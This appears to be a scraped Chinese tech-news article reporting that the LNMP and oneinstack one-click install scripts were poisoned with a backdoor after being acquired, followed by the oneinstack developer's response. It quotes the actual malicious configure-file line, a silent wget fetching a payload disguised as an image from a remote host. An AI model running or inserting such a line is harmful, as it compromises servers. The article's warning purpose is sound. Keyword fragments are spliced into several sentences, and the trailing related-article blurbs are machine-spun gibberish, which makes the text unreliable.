您现在的位置是:探索 >>正文
继LNMP后oneinstack也被添加了后门程序 建议用户不要使用这类脚本 – 蓝点网
探索3人已围观
简介9 月下旬,国内安全公司发现知名 Web 集成环境安装脚本 “lnmp 一键安装包” 被投毒,开发者、站长、企业 IT 管理员下载的一键安装包被加了后门程序。当时我们都以为这是 LNMP 一键安装包的 ...
9 月下旬,继L建议脚本国内安全公司发现知名 Web 集成环境安装脚本 “lnmp 一键安装包” 被投毒,后后门开发者、也被用户用类站长、添加企业 IT 管理员下载的程序一键安装包被加了后门程序。
当时我们都以为这是不使 LNMP 一键安装包的服务器被黑了 (LNMP.org),不过后来有网友发现 LNMP 一键安装包已经被金华市矜贵网络科技有限公司 (下称金华矜贵) 收购。蓝点
而关于安装包被投毒问题金华矜贵没有发布任何声明,继L建议脚本LNMP 论坛的后后门发帖也遭到管理员删除。
现在来看这并不是也被用户用类服务器被黑了,因为被金华矜贵收购的添加另一个集成环境安装脚本 oneinstack 也被发现投毒,所以情况很明了了:那就是程序根本不是服务器被黑,而是不使他们自己在脚本里插入了恶意代码,用来下载某些恶意软件,蓝点进而可以控制大量网站或服务器,继L建议脚本但具体目的尚不清楚。
目前在 GitHub 和 V2EX 上已经有帖子在讨论这件事,鉴于金华矜贵还试图收购秋水逸冰的 lamp.sh 一键安装包 (但被秋大拒绝了),他们后续可能还会盯上其他一键安装包,因此建议大家不要再使用这类一键安装包,否则自己的网站或服务器可能也会变成肉鸡。
更新:oneinstack 开发者回应称:金华市矜贵网络科技有限公司收购现有的几个面板以及安装包主要是为了布局类似宝塔的产品。想依赖 oneinstack 打开知名度。公司作为项目的投资商。协商的协议为公司为项目提供开发资金,并提供所有服务器资源。但是项目的管理权限以及运维权限都在我手中。目前各位开发者的精力主要是进行新的面板开发,对于出现本次被挂马事故主要原因在于我们没有对项目进行及时的管理。后续会加强安全措施。杜绝该问题的出现。
恶意代码藏在图片里:
pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
详细请看 GitHub 讨论:https://github.com/oneinstack/oneinstack/issues/511
Tags:
上一篇:伯美莱全屋定制——简美衣柜
下一篇:咖啡店奈何样样 该若何经营
相关文章
黑怪异健发中国行20余场行动 西湖的七夕专场创记实了!
探索七夕,对于恋爱中的人来说,便是大秀恩爱不断虐狗,往年七夕,在杭州西湖上有一场三十多万人旁不雅的直播,一对于情侣在西湖上的画舫中,妨碍了今世的结发仪式,现场苦涩到爆。2020年8月25-27日,头发理疗 ...
【探索】
阅读更多摆摊摹拟器去了 《餐车大年夜亨》9月15日正式上线
探索继《减油站大年夜亨》以后,心跳游戏HBG再次与Drago文娱共同开做推出摹拟运营游戏《餐车大年夜亨》,本做于9月15日正式上线。卖价70元,尾周享用-10%的扣头劣惠。同时推出分歧的捆绑包供各位玩家自 ...
【探索】
阅读更多刘嘉玲曝梁晨伟出演网飞新剧 将飞往减拿大年夜拍摄
探索据中媒报导,刘嘉玲远日流露梁晨伟出演一部网飞新剧。她表示梁晨伟本去已开端拍那部剧了,但果疫情提早,会正在稍后飞往减拿大年夜拍摄。梁晨伟的上一部电视剧做品,是1989年喷鼻港无线电视出品的20散古拆武侠 ...
【探索】
阅读更多